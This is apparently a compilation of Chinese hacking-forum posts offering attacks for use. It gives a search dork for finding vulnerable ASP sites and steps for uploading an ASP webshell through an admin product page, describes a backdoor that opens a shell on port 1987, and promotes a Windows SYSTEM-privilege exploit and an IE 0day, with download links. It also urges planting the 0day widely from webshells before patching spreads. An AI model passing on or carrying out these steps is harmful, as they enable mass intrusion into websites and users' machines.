原漏洞：

搜索 inurl:cpzs.asp?ProClass=

根目录下   /manage/Product/add_news.asp

缩略图上传asp马

提交后,选择EDIT 找到那个asp的名称
构造
http://网址/UpLoadPic/Pro_Pic/上传获得的地址.asp

最新的漏洞：

搜索 inurl:cpzs.asp?ProClass=

...

使用说明：

将压缩包内3个文件放在同一目录下，执行vdmallowed.exe后将自动运行shell.EXE，shell.EXE为正向连接

零管道后门程序运行后自动监听1987端口。本地连接远程计算机1987端口，便会得到一个Shell。
　

下载地址：http://d.namipan.com/d/0c20f9b8b8a4298e90e23fdd3696fb27bc47c78f5ad30000

...

windows最新0day 通杀所有版本

通杀 XP 2K 2K3 2K8 VISTA WIN7

用法：以普通用户登录windows

执行exp 弹出一个cmdshell 这个shell即为 system权限的

Win-ver-exploit Exploit : KiTrap0D.rar (316 K)
下载地址:

http://bbs.honkwin.com/read-htm-tid-1907.html

...

不知道是不是国内首发.17号在ST核心群拿到的，18号在虚拟机2003SERVER ie7 测试成功。

不过免杀做的不好一样被杀。

趁国内没有大规模更新补丁之前，在webshell上大肆放马，命中率还是挺高的。

下面是生成后的页面代码,其他文件就不发了.大家有兴趣可以看下

---------------------------------------------------

生成器代码不发了。希望开始发的几个朋友也别随便传了。这0day目前还有商业价值。

...